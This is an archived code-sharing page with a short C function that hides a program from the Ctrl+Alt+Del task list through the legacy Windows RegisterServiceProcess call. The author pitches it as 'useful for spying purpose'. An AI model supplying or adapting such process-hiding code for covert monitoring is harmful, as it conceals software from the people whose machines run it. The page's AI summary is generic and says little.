Advertisement
ASP_Volume2 Security #41522

Hide Your Program

This code hides your applicatoin from CTRL+ALT+DEL List. Useful for spying purpose. Plz Do vote Me. or mail me for info , [email protected]

AI

Tóm tắt bởi AI: This codebase represents a historical implementation of the logic described in the metadata. Our preservation engine analyzes the structure to provide context for modern developers.

Mã nguồn
original-source
void Hide(void)
{
	typedef DWORD (__stdcall *pRegFunction)(DWORD, DWORD);
	HINSTANCE		hKernelLib;
	pRegFunction	RegisterServiceProcess;
		
	hKernelLib = LoadLibrary("kernel32.dll");
	if (hKernelLib)
	{
		RegisterServiceProcess = (pRegFunction)GetProcAddress(hKernelLib, "RegisterServiceProcess");
		if (RegisterServiceProcess)
			RegisterServiceProcess(GetCurrentProcessId(), 1);
		::FreeLibrary(hKernelLib);
	}						//change 1 to 0 for ctrl+alt+del to view app
}
Upload
Bình luận gốc (3)
Được khôi phục từ Wayback Machine